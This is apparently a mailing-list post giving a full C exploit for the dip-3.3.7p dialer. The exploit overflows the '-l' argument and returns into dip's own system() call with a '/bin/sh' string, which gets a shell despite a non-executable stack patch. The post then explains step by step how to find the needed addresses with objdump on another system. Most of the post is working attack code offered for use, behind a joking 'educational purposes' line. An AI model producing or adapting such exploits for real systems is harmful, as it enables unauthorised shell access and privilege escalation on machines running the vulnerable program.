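Hi, While playing around with dip-3.3.7p I realized that the method I used in my previous posting won't do. So I had a look at the source and developed a new program. Here it goes:

------------------- sammeltonne.c -------------------
/*
 * Program to get a shell from dip-3.3.7p on a system with
 * Solar Designer's stack patch (non-executable stack) installed.
 * by tstroegeat_private-erlangen.de
 *
 * Of course this is just for educational purposes too :)
 *
 * The overflowing "-l" argument overwrites the saved return address
 * with SOMETEXT, so the function returns into dip's own call to
 * system(); the next word on the stack, CMDSTR, is then what system()
 * finds as its argument.  Both addresses are inside dip's text segment,
 * so nothing on the stack is ever executed, which is what gets around
 * the stack patch.
 *
 * The address words are written in host byte order: this only works on
 * a little-endian (i386) system, which is where the addresses below
 * were taken from.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define SOMETEXT 0x0804cee5 /* address of the call to system() in dip's text segment */
#define CMDSTR   0x08054f0e /* address of the "/bin/sh" string in dip's text segment */
#define DIP      "/usr/sbin/dip" /* path of dip */

#define MEMLEN         256 /* size of the overflowing argument */
#define DEFAULT_OFFSET 117 /* distance to the saved return address, found by trial */

/*
 * Usage: sammeltonne [offset]
 * offset overrides DEFAULT_OFFSET; it is rejected unless the whole
 * payload (two addresses plus a zero word) fits inside mem.
 * Returns 1 on a bad argument or when execve() fails; on success
 * the process image is replaced by dip and nothing returns.
 */
int main(int argc, char *argv[])
{
    char mem[MEMLEN];
    char *name[] = { DIP, "-k", "-l", mem, (char *)0 };
    unsigned int code[] = { SOMETEXT, CMDSTR, 0 };
    long off = DEFAULT_OFFSET;

    if (argc > 1) {
        /* strtol reports bad input; atoi would silently turn it into 0 */
        char *end;
        errno = 0;
        off = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "bad offset: %s\n", argv[1]);
            return 1;
        }
    }

    /* an unchecked offset would overflow our own stack long before
     * dip's gets a chance: the payload has to end inside mem */
    if (off < 0 || (size_t)off + sizeof code > sizeof mem) {
        fprintf(stderr, "offset must be between 0 and %zu\n",
                sizeof mem - sizeof code);
        return 1;
    }

    /* filler up to the return address, then the two addresses and a
     * terminating zero word.  memcpy() places exactly these bytes
     * instead of relying on strcpy() stopping at the right spot. */
    memset(mem, 'a', sizeof mem);
    memcpy(mem + off, code, sizeof code);
    mem[MEMLEN - 1] = '\0';

    /* the payload travels through argv, so a zero byte inside either
     * address would cut it short; neither of these two has one */
    execve(name[0], name, NULL);
    perror("execve");
    return 1;
}
-----------------------------------------------

SOMETEXT: address in the text segment where system() is called.
CMDSTR: address in the text segment where a suitable command string is stored (dip is nice enough to have a /bin/sh string in its code).
Both addresses will differ on your system, so here is how to find them:
... objdump --disassemble-all /usr/sbin/dip ...
Now search for the following pattern:
...
0804ced4 pushl %ebx
0804ced5 pushl $0x8054848
0804ceda pushl $0x6
0804cedc call 08049678
0804cee1 addl $0xc,%esp
0804cee4 pushl %ebx
-->0804cee5 call 080493c8 SOMETEXT
0804ceea addl $0x4,%esp
0804ceed testl %eax,%eax
0804ceef jne 0804cf9e
0804cef5 pushl %esi
0804cef6 movl 0x8(%ebp),%eax
0804cef9 movl 0x660(%eax),%eax
0804ceff pushl %eax
...
0804eefd leal 0xfffffc00(%ebp),%eax
0804ef03 pushl %eax
0804ef04 pushl $0x8054f08
0804ef09 pushl $0x8054f0b
0804ef0e pushl $0x8054f0e<-- CMDSTR
0804ef13 call 08049368
0804ef18 pushl $0x7f
0804ef1a call 08049768
0804ef1f nop
...
tst.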